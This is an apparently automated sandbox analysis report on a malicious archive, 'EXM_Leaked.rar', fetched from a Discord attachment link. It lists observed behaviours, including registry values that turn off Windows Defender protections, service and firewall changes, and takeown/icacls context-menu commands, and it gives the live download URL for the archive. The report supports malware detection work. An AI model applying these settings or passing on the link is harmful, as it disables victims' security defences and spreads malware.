Analysis Overview
Threat Level: Known bad
The file https://cdn.discordapp.com/attachments/1122175843565842633/1181259340129243156/EXM_Leaked.rar?ex=65ef267d&is=65dcb17d&hm=19bc37788f94fff83e2b28d6138daaf56dfdeead71c7e143547b0cdea4af58d1& was found to be: Known bad.
Malicious Activity Summary
Modifies Windows Defender Real-time Protection settings
Modifies visibility of file extensions in Explorer
Modifies security service
Modifies boot configuration data using bcdedit
Stops running service(s)
Modifies Windows Firewall
Modifies system executable filetype association
Executes dropped EXE
UPX packed file
Loads dropped DLL
Adds Run key to start application
Launches sc.exe
Enumerates processes with tasklist
Modifies registry class
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of FindShellTrayWindow
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Uses Task Scheduler COM API
Enumerates system info in registry
Runs net.exe
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Gathers network information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-02 23:03
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-02 23:03
Reported
2024-03-02 23:08
Platform
win10v2004-20240226-en
Max time kernel
273s
Max time network
280s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Modifies visibility of file extensions in Explorer
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "0" | C:\Windows\system32\reg.exe | N/A |
Modifies boot configuration data using bcdedit
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
Loads dropped DLL
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\ = "Grant Admin Full Control" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\icon = "C:\\Windows\\system32\\imageres.dll ,73" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\NoWorkingDirectory | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\ = "Grant Admin Full Control" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\icon = "C:\\Windows\\system32\\imageres.dll ,73" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\NoWorkingDirectory | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command | C:\Windows\system32\reg.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\icon = "C:\\Windows\\system32\\imageres.dll ,73" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\icon = "C:\\Windows\\system32\\imageres.dll ,73" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\OptimizeWindowsSearchResultsForScreenReaders = "0" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\icon = "C:\\Windows\\system32\\imageres.dll ,73" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\NoWorkingDirectory | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\NoWorkingDirectory | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\User\Default\SearchScopes | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\User\Default\SearchScopes\ShowSearchSuggestionsGlobal = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\icon = "C:\\Windows\\system32\\imageres.dll ,73" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DoNotTrack = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\ = "Grant Admin Full Control" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\ = "Grant Admin Full Control" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\User | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\EnableEncryptedMediaExtensions = "0" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{2D8D44F7-5EB9-4D44-9815-5FF6266782D3} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter\EnabledV9 = "0" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\ = "Grant Admin Full Control" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1122175843565842633/1181259340129243156/EXM_Leaked.rar?ex=65ef267d&is=65dcb17d&hm=19bc37788f94fff83e2b28d6138daaf56dfdeead71c7e143547b0cdea4af58d1&
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=5700 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=5744 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4544 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --mojo-platform-channel-handle=6128 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --mojo-platform-channel-handle=6256 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --mojo-platform-channel-handle=5572 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5924 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5432 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4884 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\EXM_Leaked.rar"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --mojo-platform-channel-handle=6448 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x30c 0x4c4
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x24c,0x7ff9d0222e98,0x7ff9d0222ea4,0x7ff9d0222eb0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
